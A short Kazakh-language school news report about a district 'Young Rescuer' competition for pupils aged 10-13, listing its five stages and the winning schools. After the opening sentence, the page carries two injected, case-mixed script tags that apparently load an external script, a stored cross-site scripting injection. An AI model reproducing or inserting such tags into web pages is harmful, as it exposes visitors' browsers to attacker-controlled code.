20 мамырда мектебімізде 10-13 жастағы оқушылар арасында аудандық Білім бөлімі мен Төтенше жағдайлар бөлімінің ұйымдастыруымен аудан мектептерінің «Жас құтқарушы» клубтары арасында сайыс өткізілді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

23.05.2022

Іс-шараның мақсаты - жастарға болашақ мамандығын анықтауға жәрдемдесу және төтенше жағдайларда дұрыс әрекет етуге үйрету. 

Жарыс шартына сәйкес оқушылар әртүрлі тапсырмаларды орындау арқылы 5 бәсекелестік кезеңнен өтуі тиіс еді: сәлемдесу, алғашқы медециналық көмек, зардап шегушіні тасымалдау, өрт сөндіру эстафетасы, арқан тарту. Байқаудың қорытындысы бойынша бірінші орынды Буланды орта мектебінің командасы, екінші орынды Кеңащы орта мектебі және үшінші орынды Макин орта мектебі иеленді. Жеңімпаздар дипломдар мен кубоктармен марапатталды, ал жетекшілеріне шағын сыйлықтар берілді. Жеңімпаздарды жеңістермен құттықтаймыз!
Просмотров: 534


Пікір қосу



Деректерді қолтаңбаға қосу